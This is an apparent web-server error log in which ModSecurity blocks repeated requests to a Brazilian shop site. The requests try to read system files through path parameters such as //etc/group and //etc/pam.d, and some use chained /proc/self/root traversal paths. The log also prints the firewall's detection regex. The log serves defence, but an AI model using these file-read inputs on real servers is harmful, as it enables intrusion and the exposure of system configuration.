[Fri Mar 20 10:45:06.623867 2026] [:error] [pid 7235:tid 140411632822016] [client 57.141.18.55:51170] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1PYvqxLDW4GITHUkQMNgAAAQ0"]
[Fri Mar 20 10:45:30.139924 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.115:52650] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Peta6ubjKNq_cu4b82AAAA0E"]
[Fri Mar 20 10:45:34.109006 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.244.43:47420] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1Pfl1pVZ5mVmJwsFNSeAAAAFI"]
[Fri Mar 20 10:45:34.891555 2026] [mime_magic:error] [pid 7893:tid 140411658000128] (70014)End of file found: [client 57.141.18.60:52810] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:45:38.941774 2026] [mime_magic:error] [pid 31215:tid 140411716749056] (70014)End of file found: [client 57.141.18.79:53014] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:45:40.198567 2026] [:error] [pid 11167:tid 140411683178240] [client 57.141.18.4:53074] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1PhPHIg5MgXLBnicMZJwAAAcc"]
[Fri Mar 20 10:45:49.013540 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.54:53552] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Pjda6ubjKNq_cu4b87AAAA1A"]
[Fri Mar 20 10:45:50.467204 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.105:53722] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1PjjJ3M9BSuKP7CAZGzQAAAI0"]
[Fri Mar 20 10:46:00.004873 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.104:54332] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1PmBCii7xarUs8iHaNhwAAAhI"]
[Fri Mar 20 10:46:04.043767 2026] [:error] [pid 11642:tid 140411574073088] [client 74.7.243.128:48528] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1PnLninkcc-iUj5AqA1QAAA5Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:46:08.169228 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.122:54604] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1PoDJ3M9BSuKP7CAZHDgAAAIM"]
[Fri Mar 20 10:46:08.237203 2026] [:error] [pid 21219:tid 140411649607424] [client 57.141.18.75:54694] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1PoPXLqtnMIWvjpaK-KwAAAos"]
[Fri Mar 20 10:46:11.135768 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.243.128:58542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1PojJ3M9BSuKP7CAZHFAAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 10:46:12.364016 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.123:54776] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1PpNa6ubjKNq_cu4b9DQAAA0I"]
[Fri Mar 20 10:46:23.307602 2026] [:error] [pid 11642:tid 140411557287680] [client 57.141.18.36:55176] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Pr7ninkcc-iUj5AqA3gAAA5Y"]
[Fri Mar 20 10:46:29.516802 2026] [mime_magic:error] [pid 9818:tid 140411658000128] (70014)End of file found: [client 57.141.18.43:55510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:46:40.556915 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.63:56336] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1PwLninkcc-iUj5AqA8AAAA4A"]
[Fri Mar 20 10:46:45.879146 2026] [mime_magic:error] [pid 15826:tid 140411674785536] (70014)End of file found: [client 57.141.18.65:56542] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:46:59.344727 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.84:57030] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1P0xCii7xarUs8iHaNwwAAAhg"]
[Fri Mar 20 10:47:01.877988 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.88:57038] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1P1RCii7xarUs8iHaNyQAAAhI"]
[Fri Mar 20 10:47:01.991400 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.83:57104] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1P1TJ3M9BSuKP7CAZHmQAAAIk"]
[Fri Mar 20 10:47:14.879453 2026] [:error] [pid 21219:tid 140411590858496] [client 57.141.18.71:57958] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1P4vXLqtnMIWvjpaK-hQAAApI"]
[Fri Mar 20 10:47:15.719817 2026] [mime_magic:error] [pid 9818:tid 140411624429312] (70014)End of file found: [client 57.141.18.19:58001] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:47:15.719827 2026] [mime_magic:error] [pid 9818:tid 140411599251200] (70014)End of file found: [client 216.73.216.191:58000] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:47:27.951528 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.74:58560] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1P7vXLqtnMIWvjpaK-kgAAApU"]
[Fri Mar 20 10:47:54.455148 2026] [:error] [pid 31215:tid 140411632822016] [client 57.141.18.70:59702] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QCgF0L0L-SsrnPo6MXAAAAs0"]
[Fri Mar 20 10:47:59.067836 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.101:60036] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QD_qxLDW4GITHUkQM9wAAAQg"]
[Fri Mar 20 10:47:59.571603 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.113:60054] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1QD-oXxyEfFpUF8f-jtgAAAUU"]
[Fri Mar 20 10:48:01.551691 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.99:60168] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1QEeoXxyEfFpUF8f-jvwAAAVQ"]
[Fri Mar 20 10:48:09.121245 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:47412] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1QGfqxLDW4GITHUkQNDgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:48:12.215481 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:58658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1QHPqxLDW4GITHUkQNFAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:48:14.576726 2026] [mime_magic:error] [pid 7235:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:32856] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:48:19.475139 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.40:33076] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1QI11pVZ5mVmJwsFNTDgAAAFg"]
